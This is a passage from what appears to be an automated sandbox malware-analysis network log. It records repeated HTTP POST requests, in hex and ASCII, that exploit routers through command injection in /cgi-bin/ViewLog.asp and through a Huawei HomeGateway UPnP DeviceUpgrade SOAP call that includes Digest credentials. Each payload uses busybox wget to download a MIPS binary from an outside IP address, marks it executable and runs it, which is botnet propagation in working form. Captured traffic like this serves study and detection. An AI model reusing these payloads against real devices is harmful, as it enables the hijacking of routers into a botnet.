                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18192.168.2.145477494.120.12.1118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:53.296741009 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19192.168.2.144526094.64.14.988080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:53.301520109 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:53.543592930 CET465INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 07:07:32 GMT
                                              Server: Webs
                                              X-Frame-Options: SAMEORIGIN
                                              Cache-Control: no-cache
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20192.168.2.145619094.120.45.738080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:53.708159924 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21192.168.2.1440842156.254.85.18537215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:00.708034992 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:04.969000101 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:11.112734079 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:23.144279003 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:48.999141932 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:38.149080992 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22192.168.2.144580685.23.227.718080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:01.797225952 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23192.168.2.144078831.136.210.2018080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:01.981996059 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:02.569220066 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:03.689060926 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:05.992949009 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
